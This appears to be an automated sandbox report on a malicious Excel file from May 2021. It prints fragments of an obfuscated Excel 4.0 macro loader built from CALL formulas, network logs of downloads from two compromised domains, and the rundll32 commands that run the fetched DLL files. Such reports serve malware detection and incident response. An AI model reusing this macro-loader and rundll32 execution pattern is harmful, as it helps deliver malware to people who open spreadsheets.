                                                              ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                              ,,,=HALT(),,,,,,,,,,,,"=4984654+9846544+468464=CALL(Sheet2!AY107&""n"",Sheet2!AY108&""A"",Sheet2!AY118,before.3.21.42.sheet!AR49,Sheet2!AT114,before.3.21.42.sheet!AT39,0,0)=CALL(Sheet2!AY107&""n"",Sheet2!AY108&""A"",Sheet2!AY118,before.3.21.42.sheet!AR49,Sheet2!AT115,before.3.21.42.sheet!AT39&""1"",0,0)",,,,,,,,,,,,,,,=Sheet2!AW142(),,,,,,,,,,,,,,,,,,,,,U,J,",D",..\jordji.nbvt1R,J,l,L,C,l,D,C,R,o,B,e,w,B,g,n,,i,l,,s,o,,t,a,,e,d,0,r,T,,S,o,,e,F,,r,i,,ve,l,,r,e,,,

                                                              Network Behavior

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              May 4, 2021 13:30:32.913629055 CEST49694443192.168.2.6192.254.233.89
                                                              May 4, 2021 13:30:33.098670006 CEST44349694192.254.233.89192.168.2.6
                                                              May 4, 2021 13:30:33.098889112 CEST49694443192.168.2.6192.254.233.89
                                                              May 4, 2021 13:30:33.106025934 CEST49694443192.168.2.6192.254.233.89
                                                              May 4, 2021 13:30:33.291604996 CEST44349694192.254.233.89192.168.2.6
                                                              May 4, 2021 13:30:33.293154001 CEST44349694192.254.233.89192.168.2.6
                                                              May 4, 2021 13:30:33.293171883 CEST44349694192.254.233.89192.168.2.6
                                                              May 4, 2021 13:30:33.293188095 CEST44349694192.254.233.89192.168.2.6
                                                              May 4, 2021 13:30:33.293281078 CEST49694443192.168.2.6192.254.233.89
                                                              May 4, 2021 13:30:33.335212946 CEST49694443192.168.2.6192.254.233.89
                                                              May 4, 2021 13:30:33.520991087 CEST44349694192.254.233.89192.168.2.6
                                                              May 4, 2021 13:30:33.521300077 CEST49694443192.168.2.6192.254.233.89
                                                              May 4, 2021 13:30:33.537909985 CEST49694443192.168.2.6192.254.233.89
                                                              May 4, 2021 13:30:33.767009020 CEST44349694192.254.233.89192.168.2.6
                                                              May 4, 2021 13:30:34.225502968 CEST44349694192.254.233.89192.168.2.6
                                                              May 4, 2021 13:30:34.225538969 CEST44349694192.254.233.89192.168.2.6
                                                              May 4, 2021 13:30:34.225799084 CEST49694443192.168.2.6192.254.233.89
                                                              May 4, 2021 13:30:34.227082014 CEST49694443192.168.2.6192.254.233.89
                                                              May 4, 2021 13:30:34.411990881 CEST44349694192.254.233.89192.168.2.6
                                                              May 4, 2021 13:30:34.428113937 CEST49697443192.168.2.6192.185.5.2
                                                              May 4, 2021 13:30:34.590596914 CEST44349697192.185.5.2192.168.2.6
                                                              May 4, 2021 13:30:34.590920925 CEST49697443192.168.2.6192.185.5.2
                                                              May 4, 2021 13:30:34.591828108 CEST49697443192.168.2.6192.185.5.2
                                                              May 4, 2021 13:30:34.754307985 CEST44349697192.185.5.2192.168.2.6
                                                              May 4, 2021 13:30:34.798787117 CEST44349697192.185.5.2192.168.2.6
                                                              May 4, 2021 13:30:34.798830032 CEST44349697192.185.5.2192.168.2.6
                                                              May 4, 2021 13:30:34.798846006 CEST44349697192.185.5.2192.168.2.6
                                                              May 4, 2021 13:30:34.799097061 CEST49697443192.168.2.6192.185.5.2
                                                              May 4, 2021 13:30:34.809848070 CEST49697443192.168.2.6192.185.5.2
                                                              May 4, 2021 13:30:34.972557068 CEST44349697192.185.5.2192.168.2.6
                                                              May 4, 2021 13:30:34.995088100 CEST44349697192.185.5.2192.168.2.6
                                                              May 4, 2021 13:30:34.995203018 CEST49697443192.168.2.6192.185.5.2
                                                              May 4, 2021 13:30:34.996277094 CEST49697443192.168.2.6192.185.5.2
                                                              May 4, 2021 13:30:35.197578907 CEST44349697192.185.5.2192.168.2.6
                                                              May 4, 2021 13:30:35.199228048 CEST44349697192.185.5.2192.168.2.6
                                                              May 4, 2021 13:30:35.200345039 CEST49697443192.168.2.6192.185.5.2
                                                              May 4, 2021 13:30:35.200406075 CEST49697443192.168.2.6192.185.5.2
                                                              May 4, 2021 13:30:35.200413942 CEST49697443192.168.2.6192.185.5.2
                                                              May 4, 2021 13:30:35.205187082 CEST49699443192.168.2.6192.185.5.2
                                                              May 4, 2021 13:30:35.365602016 CEST44349697192.185.5.2192.168.2.6
                                                              May 4, 2021 13:30:35.366038084 CEST44349699192.185.5.2192.168.2.6
                                                              May 4, 2021 13:30:35.366206884 CEST49699443192.168.2.6192.185.5.2
                                                              May 4, 2021 13:30:35.366786957 CEST49699443192.168.2.6192.185.5.2
                                                              May 4, 2021 13:30:35.527796030 CEST44349699192.185.5.2192.168.2.6
                                                              May 4, 2021 13:30:35.527837038 CEST44349699192.185.5.2192.168.2.6
                                                              May 4, 2021 13:30:35.527909040 CEST49699443192.168.2.6192.185.5.2
                                                              May 4, 2021 13:30:35.528770924 CEST49699443192.168.2.6192.185.5.2
                                                              May 4, 2021 13:30:35.532295942 CEST49699443192.168.2.6192.185.5.2
                                                              May 4, 2021 13:30:35.690968990 CEST44349699192.185.5.2192.168.2.6
                                                              May 4, 2021 13:30:35.839540958 CEST44349699192.185.5.2192.168.2.6
                                                              May 4, 2021 13:30:35.839566946 CEST44349699192.185.5.2192.168.2.6
                                                              May 4, 2021 13:30:35.839628935 CEST49699443192.168.2.6192.185.5.2
                                                              May 4, 2021 13:30:35.839665890 CEST49699443192.168.2.6192.185.5.2
                                                              May 4, 2021 13:30:35.840308905 CEST49699443192.168.2.6192.185.5.2
                                                              May 4, 2021 13:30:36.000338078 CEST44349699192.185.5.2192.168.2.6

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              May 4, 2021 13:30:14.931613922 CEST5567353192.168.2.68.8.8.8
                                                              May 4, 2021 13:30:14.981534004 CEST53556738.8.8.8192.168.2.6
                                                              May 4, 2021 13:30:16.589236975 CEST5777353192.168.2.68.8.8.8
                                                              May 4, 2021 13:30:16.637959957 CEST53577738.8.8.8192.168.2.6
                                                              May 4, 2021 13:30:17.535780907 CEST5998653192.168.2.68.8.8.8
                                                              May 4, 2021 13:30:17.584537029 CEST53599868.8.8.8192.168.2.6
                                                              May 4, 2021 13:30:18.639148951 CEST5247853192.168.2.68.8.8.8
                                                              May 4, 2021 13:30:18.703768969 CEST53524788.8.8.8192.168.2.6
                                                              May 4, 2021 13:30:20.692650080 CEST5893153192.168.2.68.8.8.8
                                                              May 4, 2021 13:30:20.742396116 CEST53589318.8.8.8192.168.2.6
                                                              May 4, 2021 13:30:24.285886049 CEST5772553192.168.2.68.8.8.8
                                                              May 4, 2021 13:30:24.343310118 CEST53577258.8.8.8192.168.2.6
                                                              May 4, 2021 13:30:26.451653004 CEST4928353192.168.2.68.8.8.8
                                                              May 4, 2021 13:30:26.501336098 CEST53492838.8.8.8192.168.2.6
                                                              May 4, 2021 13:30:27.833035946 CEST5837753192.168.2.68.8.8.8
                                                              May 4, 2021 13:30:27.881871939 CEST53583778.8.8.8192.168.2.6
                                                              May 4, 2021 13:30:32.843764067 CEST5507453192.168.2.68.8.8.8
                                                              May 4, 2021 13:30:32.900943995 CEST53550748.8.8.8192.168.2.6
                                                              May 4, 2021 13:30:32.944375038 CEST5451353192.168.2.68.8.8.8
                                                              May 4, 2021 13:30:33.004096985 CEST53545138.8.8.8192.168.2.6
                                                              May 4, 2021 13:30:33.904851913 CEST6204453192.168.2.68.8.8.8
                                                              May 4, 2021 13:30:33.955986977 CEST53620448.8.8.8192.168.2.6
                                                              May 4, 2021 13:30:34.244324923 CEST6379153192.168.2.68.8.8.8
                                                              May 4, 2021 13:30:34.425299883 CEST53637918.8.8.8192.168.2.6
                                                              May 4, 2021 13:30:34.840548992 CEST6426753192.168.2.68.8.8.8
                                                              May 4, 2021 13:30:34.891115904 CEST53642678.8.8.8192.168.2.6
                                                              May 4, 2021 13:30:35.767070055 CEST4944853192.168.2.68.8.8.8
                                                              May 4, 2021 13:30:35.817197084 CEST53494488.8.8.8192.168.2.6
                                                              May 4, 2021 13:30:39.763974905 CEST6034253192.168.2.68.8.8.8
                                                              May 4, 2021 13:30:39.825874090 CEST53603428.8.8.8192.168.2.6
                                                              May 4, 2021 13:30:40.689188957 CEST6134653192.168.2.68.8.8.8
                                                              May 4, 2021 13:30:40.738027096 CEST53613468.8.8.8192.168.2.6
                                                              May 4, 2021 13:30:41.590186119 CEST5177453192.168.2.68.8.8.8
                                                              May 4, 2021 13:30:41.640290976 CEST53517748.8.8.8192.168.2.6
                                                              May 4, 2021 13:30:42.526679993 CEST5602353192.168.2.68.8.8.8
                                                              May 4, 2021 13:30:42.576664925 CEST53560238.8.8.8192.168.2.6
                                                              May 4, 2021 13:30:43.312807083 CEST5838453192.168.2.68.8.8.8
                                                              May 4, 2021 13:30:43.365963936 CEST53583848.8.8.8192.168.2.6
                                                              May 4, 2021 13:31:10.071494102 CEST6026153192.168.2.68.8.8.8
                                                              May 4, 2021 13:31:10.123071909 CEST53602618.8.8.8192.168.2.6
                                                              May 4, 2021 13:31:50.820354939 CEST5606153192.168.2.68.8.8.8
                                                              May 4, 2021 13:31:50.884865046 CEST53560618.8.8.8192.168.2.6

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                              May 4, 2021 13:30:32.843764067 CEST192.168.2.68.8.8.80x3362Standard query (0)industrialarttextile.comA (IP address)IN (0x0001)
                                                              May 4, 2021 13:30:34.244324923 CEST192.168.2.68.8.8.80x99c1Standard query (0)anaheimdermatologists.comA (IP address)IN (0x0001)

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                              May 4, 2021 13:30:32.900943995 CEST8.8.8.8192.168.2.60x3362No error (0)industrialarttextile.com192.254.233.89A (IP address)IN (0x0001)
                                                              May 4, 2021 13:30:34.425299883 CEST8.8.8.8192.168.2.60x99c1No error (0)anaheimdermatologists.com192.185.5.2A (IP address)IN (0x0001)

                                                              HTTPS Packets

                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                              May 4, 2021 13:30:33.293188095 CEST192.254.233.89443192.168.2.649694CN=mail.gdmart.com.bd CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Mar 10 10:47:11 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Jun 08 11:47:11 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                              CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                              May 4, 2021 13:30:34.798846006 CEST192.185.5.2443192.168.2.649697CN=cpcalendars.anaheimdermatologists.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Mar 17 22:18:32 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Jun 15 23:18:32 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                              CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                              Code Manipulations

                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Start time:13:30:25
                                                              Start date:04/05/2021
                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                              Imagebase:0xad0000
                                                              File size:27110184 bytes
                                                              MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:13:30:35
                                                              Start date:04/05/2021
                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:rundll32 ..\jordji.nbvt1,DllRegisterServer
                                                              Imagebase:0xd0000
                                                              File size:61952 bytes
                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:13:30:36
                                                              Start date:04/05/2021
                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:rundll32 ..\jordji.nbvt11,DllRegisterServer
                                                              Imagebase:0xd0000
                                                              File size:61952 bytes
                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Disassembly

                                                              Code Analysis

                                                              Reset < >